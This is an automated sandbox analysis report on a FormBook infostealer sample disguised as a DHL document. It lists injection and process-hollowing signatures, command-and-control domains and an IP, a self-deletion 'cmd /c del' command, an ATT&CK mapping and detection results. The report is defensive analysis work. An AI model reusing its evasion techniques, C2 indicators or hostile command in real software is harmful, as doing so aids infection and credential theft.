          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A1AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A1AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A9FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A32AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A48EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A32ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04ABFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AD8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A0E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A44A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A44A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04ABFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A38E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A18A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A05210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A0AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A0AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A23A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04ABB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04ABB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A1766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AD8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A4927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A94257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AD5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AC138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04ABD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A11B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A11B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A32397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A18794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A2DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A04F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A04F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AD070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AD070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A2F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AC131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A9FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A9FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A0DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A1FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AD8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A33B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A33B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A0DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A1EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AD8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A0F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.uenpb.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 1.32.255.152 80
          Source: C:\Windows\explorer.exeDomain query: www.wed8029.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeSection unmapped: C:\Windows\SysWOW64\explorer.exe base address: 290000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeMemory written: C:\Users\user\Desktop\DHL DOC 3406506482.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\explorer.exeThread register set: target process: 3472
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess created: C:\Users\user\Desktop\DHL DOC 3406506482.exe C:\Users\user\Desktop\DHL DOC 3406506482.exe
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\DHL DOC 3406506482.exe"
          Source: DHL DOC 3406506482.exe, 00000001.00000002.317544821.00000000033E0000.00000040.00020000.sdmp, explorer.exe, 00000002.00000000.274832594.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.259040044.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.294378470.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.277072165.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.266615744.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.378029897.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.250811965.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.287126611.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000002.513755732.0000000003250000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.266615744.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.378029897.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.250811965.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.287126611.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000002.513755732.0000000003250000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.266615744.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.378029897.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.250811965.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.287126611.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000002.513755732.0000000003250000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
          Source: DHL DOC 3406506482.exe, 00000001.00000002.317544821.00000000033E0000.00000040.00020000.sdmpBinary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
          Source: explorer.exe, 00000002.00000000.286668277.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.266152630.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.377694769.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.250248842.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000002.00000000.266615744.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.378029897.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.250811965.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.287126611.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000002.513755732.0000000003250000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000002.00000000.266615744.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.378029897.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.250811965.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.287126611.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000002.513755732.0000000003250000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeQueries volume information: C:\Users\user\Desktop\DHL DOC 3406506482.exe VolumeInformation
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.DHL DOC 3406506482.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL DOC 3406506482.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.DHL DOC 3406506482.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL DOC 3406506482.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL DOC 3406506482.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL DOC 3406506482.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL DOC 3406506482.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.245861481.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.290164309.00000000070EF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.316002438.0000000000AD0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.315948001.00000000009C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.246580702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.513416867.0000000002C70000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.512624428.0000000000790000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.275035294.00000000070EF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.249416535.0000000003799000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.315617862.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.DHL DOC 3406506482.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL DOC 3406506482.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.DHL DOC 3406506482.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL DOC 3406506482.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL DOC 3406506482.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL DOC 3406506482.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL DOC 3406506482.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.245861481.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.290164309.00000000070EF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.316002438.0000000000AD0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.315948001.00000000009C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.246580702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.513416867.0000000002C70000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.512624428.0000000000790000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.275035294.00000000070EF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.249416535.0000000003799000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.315617862.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 532855 Sample: DHL DOC 3406506482.exe Startdate: 02/12/2021 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 8 other signatures 2->42 10 DHL DOC 3406506482.exe 3 2->10         started        process3 file4 28 C:\Users\user\...\DHL DOC 3406506482.exe.log, ASCII 10->28 dropped 56 Injects a PE file into a foreign processes 10->56 14 DHL DOC 3406506482.exe 10->14         started        signatures5 process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.uenpb.xyz 1.32.255.152, 49808, 80 BCPL-SGBGPNETGlobalASNSG Singapore 17->30 32 www.wed8029.com 17->32 34 192.168.2.1 unknown unknown 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 46 Performs DNS queries to domains with low reputation 17->46 21 explorer.exe 17->21         started        signatures10 process11 signatures12 48 Self deletion via cmd delete 21->48 50 Modifies the context of a thread in another process (thread injection) 21->50 52 Maps a DLL or memory area into another process 21->52 54 Tries to detect virtualization through RDTSC time measurements 21->54 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          DHL DOC 3406506482.exe29%VirustotalBrowse
          DHL DOC 3406506482.exe38%ReversingLabsByteCode-MSIL.Trojan.Lazy

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          14.2.explorer.exe.290000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          14.0.explorer.exe.290000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.0.DHL DOC 3406506482.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.DHL DOC 3406506482.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.DHL DOC 3406506482.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.DHL DOC 3406506482.exe.33e0000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.0.DHL DOC 3406506482.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

